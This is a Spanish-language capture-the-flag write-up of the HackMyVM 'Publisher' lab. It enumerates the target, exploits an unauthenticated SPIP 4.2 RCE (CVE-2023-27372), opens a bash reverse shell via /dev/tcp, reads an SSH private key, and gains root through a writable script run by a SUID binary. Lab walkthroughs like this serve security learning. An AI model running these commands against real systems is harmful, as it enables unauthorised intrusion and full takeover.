cd ~/blog

~/writeups/hmv/111-publisher.md

111 - Publisher

easy Linux hmv 10-08-2024
SPIP 4.2 Unauthenticated RCE (CVE-2023-27372)SSH key disclosureSUID wrapper + writable script Privesc
hackmyvm.eu/machines/machine.php?vm=Publisher

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.26
 nmap -sCV -p 22,80 -oN 02-targeted.txt 192.168.1.26
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-10 10:38 -04
Nmap scan report for 192.168.1.26
Host is up (0.00032s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Publisher's Pulse: SPIP Insights & Tips
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumerando damos con /spip, una instalación de SPIP. El htaccess.txt confirma la versión 4.2, vulnerable a RCE no autenticado (CVE-2023-27372):

 gobuster dir -u 'http://192.168.1.26/spip' -w ~/Documents/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,png,gif,zip -r
...
/htaccess.txt         (Status: 200) [Size: 4307]
/ecrire               (Status: 200) [Size: 12193]
...

 searchsploit spip 4.2
...
SPIP v4.2.0 - Remote Code Execution (Unauthenticated)                         | php/webapps/51536.py
...

Confirmamos la ejecución (sin salida visible) y lanzamos una reverse shell:

 python3 51536.py -u http://192.168.1.26/spip -c 'sleep 5' -v
[+] Anti-CSRF token found : ...
[+] Execute this payload : s:27:"<?php system('sleep 5'); ?>";

 python3 51536.py -u http://192.168.1.26/spip -c 'bash -c "bash -i >& /dev/tcp/192.168.1.5/1234 0>&1"'

 ncat -nlvp 1234
Ncat: Connection from 192.168.1.26:48496.
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@41c976e507f8:/home/think/spip/spip$

En el home de think podemos leer su id_rsa:

www-data@41c976e507f8:/home/think/.ssh$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----

 ssh think@192.168.1.26 -i id_rsa_think
think@publisher:~$

Obtenemos la primera flag. Buscamos binarios SUID y encontramos run_container, que ejecuta /opt/run_container.sh (escribible):

think@publisher:/opt$ find / -perm -4000 2>/dev/null
...
/usr/sbin/run_container
...

think@publisher:/opt$ strings /usr/sbin/run_container
...
/opt/run_container.sh
...

think@publisher:/opt$ ls -l /opt/run_container.sh
-rwxrwxrwx 1 root root 1715 Mar 29 13:25 /opt/run_container.sh

/opt no es listable directamente, pero podemos saltarnos los permisos invocando el binario a través del loader dinámico:

think@publisher:/usr$ /lib64/ld-linux-x86-64.so.2 /bin/bash

think@publisher:/opt$ ls -la
total 20
-rwxrwxrwx  1 root root 1715 Mar 29 13:25 run_container.sh

Reemplazamos el script por un chmod u+s /bin/bash y disparamos el binario SUID:

think@publisher:/opt$ echo "chmod u+s /bin/bash" > run_container.sh

think@publisher:/tmp$ run_container

think@publisher:/tmp$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1183448 Apr 18  2022 /bin/bash

think@publisher:/tmp$ bash -p
bash-5.0# whoami
root

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados